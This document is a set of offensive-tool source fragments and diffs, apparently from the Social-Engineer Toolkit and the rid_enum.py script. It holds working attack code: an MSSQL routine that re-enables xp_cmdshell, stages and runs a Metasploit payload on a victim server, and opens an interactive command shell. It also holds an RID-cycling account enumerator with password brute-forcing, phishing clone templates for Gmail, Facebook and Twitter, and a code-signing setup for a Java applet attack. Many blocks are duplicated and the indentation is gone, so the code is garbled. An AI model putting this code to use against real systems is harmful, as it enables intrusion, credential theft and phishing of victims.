subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file("src/program_junk/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
if operating_system == "posix":
import pexpect
meta_path = setcore.meta_path()
setcore.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("%s/msfconsole -r src/program_junk/meta_config" % (meta_path))
# if we are using metasploit, start the listener
if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
if operating_system == "posix":
import pexpect
meta_path = setcore.meta_path()
setcore.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("%s/msfconsole -r src/program_junk/meta_config" % (meta_path))
# random executable name
random_exe = setcore.generate_random_string(10,15)
# random executable name
random_exe = setcore.generate_random_string(10,15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("""$s=gc "payload.hex";$s=[string]::Join('',$s);$s=$s.Replace('`r','');$s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)| % {$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes("payload.exe",$b);""")
########################################################################################################################################################################################################
#
# next we deploy our hex to binary if we selected option 1 (powershell)
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
if option == "1":
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("""$s=gc "payload.hex";$s=[string]::Join('',$s);$s=$s.Replace('`r','');$s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)| % {$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes("payload.exe",$b);""")
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
# blank command will store our fixed unicode variable
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# blank command will store our fixed unicode variable
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64.b64encode(powershell_command)
# this will trigger when we are ready to convert
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64.b64encode(powershell_command)
# this will trigger when we are ready to convert
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
setcore.print_status("Attempting to re-enable the xp_cmdshell stored procedure if disabled..")
# reconfigure the stored procedure and re-enable
try:
target_server.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
target_server.execute_query("RECONFIGURE")
target_server.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
target_server.execute_query("RECONFIGURE")
except: pass
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
setcore.print_status("Deploying initial debug stager to the system.")
random_file = setcore.generate_random_string(10,15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
setcore.print_status("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC)
target_server.execute_query("xp_cmdshell '%s>> %s'" % (line,random_file))
setcore.print_status("Converting the stager to a binary...")
# here we convert it to a binary
target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
setcore.print_status("Conversion complete. Cleaning up...")
# delete the random file
target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
setcore.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file("src/program_junk/payload.hex", "r")
#random_exe = setcore.generate_random_string(10,15)
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
setcore.print_status("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n")
target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
setcore.print_status("Delivery complete. Converting hex back to binary format.")
# if we are using debug conversion then convert our binary
if option == "2":
target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe))
# clean up the old files
setcore.print_status("Cleaning up old files..")
target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
setcore.print_status("Spawning seperate child process for listener...")
try: shutil.copyfile("src/program_junk/web_clone/x", definepath)
except: pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# launch the python listener through pexpect
# need to change the directory real quick
os.chdir(definepath)
# now back
os.chdir("%s/src/program_junk/web_clone/" % (definepath))
setcore.print_status("Pausing 10 seconds to let the system catch up...")
time.sleep(10)
setcore.print_status("Triggering payload stager...")
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
random_exe_execute = random_exe
random_exe = "powershell -EncodedCommand " + powershell_command
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(target_server.execute_query, (sql_command,))
time.sleep(1)
# trigger the exe if option 1 is used
if option == "1":
sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
thread.start_new_thread(target_server.execute_query, (sql_command,))
# if pexpect doesnt exit right then it freaks out
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
os.system("python ../../payloads/set_payloads/listener.py")
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
setcore.print_status("Attempting to re-enable the xp_cmdshell stored procedure if disabled..")
# reconfigure the stored procedure and re-enable
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except: pass
target_server.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
target_server.execute_query("RECONFIGURE")
target_server.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
target_server.execute_query("RECONFIGURE")
except: pass
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
setcore.print_status("Deploying initial debug stager to the system.")
random_file = setcore.generate_random_string(10,15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
setcore.print_status("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC)
target_server.execute_query("xp_cmdshell '%s>> %s'" % (line,random_file))
setcore.print_status("Converting the stager to a binary...")
# here we convert it to a binary
target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
setcore.print_status("Conversion complete. Cleaning up...")
# delete the random file
target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
setcore.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file("src/program_junk/payload.hex", "r")
#random_exe = setcore.generate_random_string(10,15)
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
setcore.print_status("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n")
target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
setcore.print_status("Delivery complete. Converting hex back to binary format.")
# if we are using debug conversion then convert our binary
if option == "2":
target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe))
# clean up the old files
setcore.print_status("Cleaning up old files..")
target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
setcore.print_status("Spawning seperate child process for listener...")
try: shutil.copyfile("src/program_junk/web_clone/x", definepath)
except: pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# launch the python listener through pexpect
# need to change the directory real quick
os.chdir(definepath)
# now back
os.chdir("%s/src/program_junk/web_clone/" % (definepath))
setcore.print_status("Pausing 10 seconds to let the system catch up...")
time.sleep(10)
setcore.print_status("Triggering payload stager...")
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
random_exe_execute = random_exe
random_exe = "powershell -EncodedCommand " + powershell_command
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(target_server.execute_query, (sql_command,))
time.sleep(1)
# trigger the exe if option 1 is used
if option == "1":
sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
thread.start_new_thread(target_server.execute_query, (sql_command,))
# if pexpect doesnt exit right then it freaks out
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except: pass
except: pass
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def cmdshell(ipaddr,port,username,password,option):
# connect to SQL server
mssql = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
mssql.execute_query("RECONFIGURE")
mssql.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
mssql.execute_query("RECONFIGURE")
except Exception, e: pass
setcore.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
mssql.select_db('master')
while 1:
# cmdshell command
cmd = raw_input("xp_cmdshell> ")
# exit if we want
if cmd == "quit" or cmd == "exit": break
mssql.execute_query("xp_cmdshell '%s'" % (cmd))
if cmd != "":
for line in mssql:
# formatting for mssql output
line = str(line)
line = line.replace("', 'output': '", "\n")
line = line.replace("{0: '", "")
line = line.replace("'}", "")
line = line.replace("{0: None, 'output': None}", "")
line = line.replace("\\r", "")
line = line.replace("The command completed with one or more errors.", "")
print line
# connect to SQL server
mssql = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
mssql.execute_query("RECONFIGURE")
mssql.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
mssql.execute_query("RECONFIGURE")
except Exception, e: pass
setcore.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
mssql.select_db('master')
while 1:
# cmdshell command
cmd = raw_input("xp_cmdshell> ")
# exit if we want
if cmd == "quit" or cmd == "exit": break
mssql.execute_query("xp_cmdshell '%s'" % (cmd))
if cmd != "":
for line in mssql:
# formatting for mssql output
line = str(line)
line = line.replace("', 'output': '", "\n")
line = line.replace("{0: '", "")
line = line.replace("'}", "")
line = line.replace("{0: None, 'output': None}", "")
line = line.replace("\\r", "")
line = line.replace("The command completed with one or more errors.", "")
print line


@ -5,7 +5,7 @@ import sys
#############################################################################################################
#
# RID Enum v0.2
# RID Cycling Tool
# RID Cycling Tool
#
# Written by: David Kennedy (ReL1K)
# Website: https://www.trustedsec.com
@ -19,192 +19,192 @@ import sys
# attempt to use lsa query furst
def check_user_lsa(ip):
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % (ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value=proc.communicate()[0]
# if the user wasnt found, return a False
if not "Domain Sid" in stdout_value:
return False
else:
return stdout_value
# pull the domain via lsaenum
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lsaquery"' % (ip), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value=proc.communicate()[0]
# if the user wasnt found, return a False
if not "Domain Sid" in stdout_value:
return False
else:
return stdout_value
# attempt to lookup an account via rpcclient
def check_user(ip, account):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip,account), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value=proc.communicate()[0]
# if the user wasnt found, return a False
if "NT_STATUS_NONE_MAPPED" in stdout_value:
return False
else:
return stdout_value
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupnames %s"' % (ip,account), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value=proc.communicate()[0]
# if the user wasnt found, return a False
if "NT_STATUS_NONE_MAPPED" in stdout_value:
return False
else:
return stdout_value
# this will do a conversion to find the account name based on rid
def sid_to_name(ip, sid, rid):
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupsids %s-%s"' % (ip, sid,rid), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if not "*unknown*" in stdout_value:
stdout_value = stdout_value.split(" ")
# will show during an unhandled request
if stdout_value[1] != "request":
return stdout_value[1]
proc = subprocess.Popen('rpcclient -U "" %s -N -c "lookupsids %s-%s"' % (ip, sid,rid), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
stdout_value = proc.communicate()[0]
if not "*unknown*" in stdout_value:
stdout_value = stdout_value.split(" ")
# will show during an unhandled request
if stdout_value[1] != "request":
return stdout_value[1]
# capture initial input
success = ""
try:
ip = sys.argv[1]
rid_start = sys.argv[2]
rid_stop = sys.argv[3]
# if password file was specified
passwords = ""
try:
# pull in password file
passwords = sys.argv[4]
# if its not there then bomb out
if not os.path.isfile(passwords):
print "[!] File was not found. Please try a path again."
sys.exit()
ip = sys.argv[1]
rid_start = sys.argv[2]
rid_stop = sys.argv[3]
# if password file was specified
passwords = ""
try:
# pull in password file
passwords = sys.argv[4]
# if its not there then bomb out
if not os.path.isfile(passwords):
print "[!] File was not found. Please try a path again."
sys.exit()
except IndexError:
pass
except IndexError:
pass
# check for python pexpect
try:
import pexpect
# check for python pexpect
try:
import pexpect
# if we dont have it
except ImportError:
print "[!] Sorry boss, python-pexpect is not installed. You need to install this first."
sys.exit()
# if we dont have it
except ImportError:
print "[!] Sorry boss, python-pexpect is not installed. You need to install this first."
sys.exit()
print "[*] Attempting lsaquery first...This will enumerate the base domain SID"
# call the check_user_lsa function and check to see if we can find base SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid != False:
if sid != "":
print "[*] Successfully enumerated base domain SID.. Moving on to extract via RID"
# format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
print "[*] Attempting lsaquery first...This will enumerate the base domain SID"
# call the check_user_lsa function and check to see if we can find base SID guid
sid = check_user_lsa(ip)
# if lsa enumeration was successful then don't do
if sid != False:
if sid != "":
print "[*] Successfully enumerated base domain SID.. Moving on to extract via RID"
# format it properly
sid = sid.rstrip()
sid = sid.split(" ")
sid = sid[4]
# if we weren't successful on lsaquery
if sid == False:
print "[!] Unable to enumerate through lsaquery, trying default account names.."
accounts = ("administrator", "guest", "krbtgt")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if sid == False:
print "[!] Failed using account name: %s...Attempting another." % (account)
else:
if sid != "":
# success! Break out of the loop
print "[*] Successfully enumerated SID account.. Moving on to extract via RID.\n"
break
else:
print "[!] Failed. Access is denied. Sorry boss."
sys.exit()
# if we weren't successful on lsaquery
if sid == False:
print "[!] Unable to enumerate through lsaquery, trying default account names.."
accounts = ("administrator", "guest", "krbtgt")
for account in accounts:
# check the user account based on tuple
sid = check_user(ip, account)
# if its false then cycle threw
if sid == False:
print "[!] Failed using account name: %s...Attempting another." % (account)
else:
if sid != "":
# success! Break out of the loop
print "[*] Successfully enumerated SID account.. Moving on to extract via RID.\n"
break
else:
print "[!] Failed. Access is denied. Sorry boss."
sys.exit()
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# pulling the exact domain SID out
sid = sid.split(" ")
# pull first in tuple
sid = sid[1]
# remove the RID number
sid = sid[:-4]
# we has no sids :( exiting
if sid == False:
print "[!] Unable to enumerate user accounts, sorry..Must not be vulnerable."
sys.exit()
# we has no sids :( exiting
if sid == False:
print "[!] Unable to enumerate user accounts, sorry..Must not be vulnerable."
sys.exit()
print "[*] Enumerating user accounts.. This could take a little while."
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
print "[*] Enumerating user accounts.. This could take a little while."
# assign rid start and stop as integers
rid_start = int(rid_start)
rid_stop = int(rid_stop)
# this is where we write out our output
if os.path.isfile("%s_users.txt" % (ip)):
# remove old file
os.remove("%s_users.txt" % (ip))
filewrite = file("%s_users.txt" % (ip), "a")
# this is where we write out our output
if os.path.isfile("%s_users.txt" % (ip)):
# remove old file
os.remove("%s_users.txt" % (ip))
filewrite = file("%s_users.txt" % (ip), "a")
# cycle through rid and enumerate the domain
while rid_start != rid_stop:
sidname = sid_to_name(ip, sid, rid_start)
if sidname != None:
# print the sid
print "Account name: " + sidname
# write the file out
filewrite.write(sidname + "\n")
# cycle through rid and enumerate the domain
while rid_start != rid_stop:
sidname = sid_to_name(ip, sid, rid_start)
if sidname != None:
# print the sid
print "Account name: " + sidname
# write the file out
filewrite.write(sidname + "\n")
# increase rid until we hit our rid_stop
rid_start = rid_start + 1
# increase rid until we hit our rid_stop
rid_start = rid_start + 1
# close the file
filewrite.close()
# close the file
filewrite.close()
print "[*] Finished enumerating user accounts... Seemed to be successful."
print "[*] Finished enumerating user accounts... Seemed to be successful."
# if we specified a password list
if passwords != "":
# our password file
passfile = file(passwords, "r").readlines()
# our list of users
userfile = file("%s_users.txt" % (ip), "r").readlines()
# if we specified a password list
if passwords != "":
# our password file
passfile = file(passwords, "r").readlines()
# cycle through a password list
for password in passfile:
# strip unused characters
password = password.rstrip()
for user in userfile:
# strip unused characters
user = user.rstrip()
# insert additional backslash for rpcclient compliance
user_fixed = user.replace("\\", "\\\\")
# brute force, single quotes in names mess things up
if not "'" in user:
child = pexpect.spawn("rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient'])
if i == 0:
print "Failed guessing username of %s and password of %s" % (user, password)
child.kill(0)
if i == 1:
print "[*] Successfully guessed username: %s with password of: %s" % (user, password)
success = success + "username: %s password: %s\n" % (user, password)
child.kill(0)
# our list of users
userfile = file("%s_users.txt" % (ip), "r").readlines()
# if we weren't successful
if success == "":
print "\n[!] Unable to brute force a user account, sorry boss."
# cycle through a password list
for password in passfile:
# strip unused characters
password = password.rstrip()
for user in userfile:
# strip unused characters
user = user.rstrip()
# insert additional backslash for rpcclient compliance
user_fixed = user.replace("\\", "\\\\")
# brute force, single quotes in names mess things up
if not "'" in user:
child = pexpect.spawn("rpcclient -U '%s%%%s' %s" % (user_fixed, password, ip))
i = child.expect(['LOGON_FAILURE', 'rpcclient'])
if i == 0:
print "Failed guessing username of %s and password of %s" % (user, password)
child.kill(0)
if i == 1:
print "[*] Successfully guessed username: %s with password of: %s" % (user, password)
success = success + "username: %s password: %s\n" % (user, password)
child.kill(0)
# if we got lucky
else:
filewrite = file("%s_success_results.txt" % (ip), "w")
filewrite.write(success)
print "[*] We got some accounts, exported results to %s_success_results.txt" % (ip)
# if we weren't successful
if success == "":
print "\n[!] Unable to brute force a user account, sorry boss."
print "[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % (ip)
# exit out after we are finished
sys.exit()
# if we got lucky
else:
filewrite = file("%s_success_results.txt" % (ip), "w")
filewrite.write(success)
print "[*] We got some accounts, exported results to %s_success_results.txt" % (ip)
print "[*] All accounts extracted via RID cycling have been exported to %s_users.txt" % (ip)
# exit out after we are finished
sys.exit()
# except keyboard interrupt
except KeyboardInterrupt:
print "[*] Okay, Okay... Exiting... Thanks for using rid_enum.py"
print "[*] Okay, Okay... Exiting... Thanks for using rid_enum.py"
# except indexerror
except IndexError, e:
print """
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
print """
.______ __ _______ _______ .__ __. __ __ .___ ___.
| _ \ | | | \ | ____|| \ | | | | | | | \/ |
| |_) | | | | .--. | | |__ | \| | | | | | | \ / |
| / | | | | | | | __| | . ` | | | | | | |\/| |
| |\ \----.| | | '--' | | |____ | |\ | | `--' | | | | |
| _| `._____||__| |_______/ _____|_______||__| \__| \______/ |__| |__|
|______|
Written by: David Kennedy (ReL1K)
Version: 0.2
@ -212,8 +212,8 @@ Company: https://www.trustedsec.com
Twitter: @TrustedSec
Twitter: @Dave_ReL1K
Rid Enum is a RID cycling attack that attempts to enumerate user accounts through
null sessions and the SID to RID enum. If you specify a password file, it will
Rid Enum is a RID cycling attack that attempts to enumerate user accounts through
null sessions and the SID to RID enum. If you specify a password file, it will
automatically attempt to brute force the user accounts when its finished enumerating.
- RID_ENUM is open source and uses all standard python libraries minus python-pexpect. -
@ -222,4 +222,4 @@ Example: ./rid_enum.py 192.168.1.50 500 50000 /root/dict.txt
Usage: ./rid_enum.py <server_ip> <start_rid> <end_rid> <optional_password_file>
"""
sys.exit()
sys.exit()

@ -19,7 +19,7 @@ Set Results = objSMS.ExecQuery _
("SELECT * From SMS_ProviderLocation WHERE ProviderForLocalSite = true")
For each Loc in Results
If Loc.ProviderForLocalSite = True Then
Set objSMS2 = objLoc.ConnectServer(Loc.Machine, "root\sms\site_"& _
Set objSMS2 = objLoc.ConnectServer(Loc.Machine, "root\sms\site_"& _
Loc.SiteCode)
strSMSSiteCode = Loc.SiteCode
end if
@ -28,7 +28,7 @@ Set Results = objSMS.ExecQuery _
Set objPkgs = objSMS2.ExecQuery("select * from SMS_Package where PackageID = '" & strPackageID & "'")
for each objPkg in objPkgs
objPkg.RefreshPkgSource(0)
Next
Next
''' % (sms_server, package_id)
# write out the file to reports

@ -12,7 +12,7 @@ core.debug_msg(me,"entering src.html.templates.template'",1)
# used for pre-defined templates
#
print """
1. Java Required
1. Java Required
2. Gmail
3. Google
4. Facebook
@ -31,33 +31,33 @@ if choice == "": choice = "1"
# if java required
if choice == "1":
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template")
URL=""
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template")
URL=""
# if gmail
if choice == "2":
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/gmail/index.template", "src/html/index.template")
URL="https://gmail.com"
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/gmail/index.template", "src/html/index.template")
URL="https://gmail.com"
# if google
if choice == "3":
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/google/index.template", "src/html/index.template")
URL="http://www.google.com"
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/google/index.template", "src/html/index.template")
URL="http://www.google.com"
# if facebook
if choice == "4":
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/facebook/index.template", "src/html/index.template")
URL="http://www.facebook.com"
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/facebook/index.template", "src/html/index.template")
URL="http://www.facebook.com"
# if twitter
if choice == "5":
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/twitter/index.template", "src/html/index.template")
URL="http://www.twitter.com"
if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template")
shutil.copyfile("src/html/templates/twitter/index.template", "src/html/index.template")
URL="http://www.twitter.com"
if not os.path.isdir("src/program_junk/web_clone"):
os.makedirs("src/program_junk/web_clone/")
if os.path.isfile("src/program_junk/web_clone/index.html"): os.remove("src/program_junk/web_clone/index.html")

@ -22,13 +22,13 @@ definepath = os.getcwd()
# print warning message that we need to install sun-java or openjdk
print """
This menu will allow you to import or create a valid code signing certificate for the Java Applet attack.
This menu will allow you to import or create a valid code signing certificate for the Java Applet attack.
You will need to purchase a code signing certificate through GoDaddy, Thawte, Verisign, etc. in order to
You will need to purchase a code signing certificate through GoDaddy, Thawte, Verisign, etc. in order to
make this work. This menu will automate the portions for you to either create the request to submit to the
certificate authority or allow you to import a code signing certificate that you may already have.
Note that purchasing a code signing certificate is somewhat difficult. It requires you to have a business name and
Note that purchasing a code signing certificate is somewhat difficult. It requires you to have a business name and
prove the legitimacy of that certificate. That means you have to register a business with the state and everything else.
Good news is, the process to do that is extremely simple. All in all, it should cost roughly around $300-350 to setup your
@ -46,83 +46,83 @@ use_flag = 0
prompt = raw_input(core.setprompt("0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
# if we selected yes if we generated a code signing certificate
if prompt == "yes" or prompt == "y":
# prompt the user to import the code signing certificate
cert_path=raw_input(core.setprompt("0", "Path to the code signing certificate file"))
if not os.path.isfile(cert_path):
# loop forever
while 1 == 1:
core.print_error("ERROR:Filename not found. Try again.")
# re-prompt if we didn't file the filename
cert_path=raw_input(core.setprompt("0", "Path to the .cer certificate file"))
# if we find the filename then break out of loop
if os.path.isfile(cert_path): break
# prompt the user to import the code signing certificate
cert_path=raw_input(core.setprompt("0", "Path to the code signing certificate file"))
if not os.path.isfile(cert_path):
# loop forever
while 1 == 1:
core.print_error("ERROR:Filename not found. Try again.")
# re-prompt if we didn't file the filename
cert_path=raw_input(core.setprompt("0", "Path to the .cer certificate file"))
# if we find the filename then break out of loop
if os.path.isfile(cert_path): break
# here is where we import the certificate
try:
core.print_info("Importing the certificate into SET...")
# here is where we import the certificate
try:
core.print_info("Importing the certificate into SET...")
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the request process below
use_flag = 1
# exception here in case it was already imported before
except: pass
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
# trigger that we have our certificate already and bypass the request process below
use_flag = 1
# exception here in case it was already imported before
except: pass
# this will exit the menu
if prompt == "quit" or prompt == "q":
use_flag = 0
prompt = "yes"
cert_path = ""
if prompt == "quit" or prompt == "q":
use_flag = 0
prompt = "yes"
cert_path = ""
# if we have a cert now or if we need to generate one
if use_flag == 1 or prompt == "no" or prompt == "n":
# if we selected no we need to create one
if prompt == "no" or prompt == "n":
# get the stuff ready to do it
core.print_info("Generating the initial request for Verisign...")
# grab input from user, fqdn
answer1=raw_input(core.setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
# grab name of organizaton
answer2=raw_input(core.setprompt("0", "Name of the organization"))
# grab two letter country code
answer3=raw_input(core.setprompt("0", "Two letter country code (ex. US)"))
# if blank, default to US
if answer3 == "": answer3 = "US"
# grab state
answer4=raw_input(core.setprompt("0", "State"))
# grab city
answer5=raw_input(core.setprompt("0", "City"))
# generate the request crl
subprocess.Popen('keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"' % (answer1,answer2,answer3, answer4, answer5), shell=True).wait()
core.print_info("Exporting the cert request to text file...")
# generate the request and export to certreq
subprocess.Popen("keytool -certreq -alias MyCert > %s/certreq.txt" % (definepath), shell=True).wait()
core.print_status("Export successful. Exported certificate under the SET root under certreq.txt")
core.print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
core.print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
core.print_info("When finished, enter the path to the .cer file below")
# cert_path is used for the certificate path when generating
# if we selected no we need to create one
if prompt == "no" or prompt == "n":
# get the stuff ready to do it
core.print_info("Generating the initial request for Verisign...")
# grab input from user, fqdn
answer1=raw_input(core.setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
# grab name of organizaton
answer2=raw_input(core.setprompt("0", "Name of the organization"))
# grab two letter country code
answer3=raw_input(core.setprompt("0", "Two letter country code (ex. US)"))
# if blank, default to US
if answer3 == "": answer3 = "US"
# grab state
answer4=raw_input(core.setprompt("0", "State"))
# grab city
answer5=raw_input(core.setprompt("0", "City"))
# generate the request crl
subprocess.Popen('keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"' % (answer1,answer2,answer3, answer4, answer5), shell=True).wait()
core.print_info("Exporting the cert request to text file...")
# generate the request and export to certreq
subprocess.Popen("keytool -certreq -alias MyCert > %s/certreq.txt" % (definepath), shell=True).wait()
core.print_status("Export successful. Exported certificate under the SET root under certreq.txt")
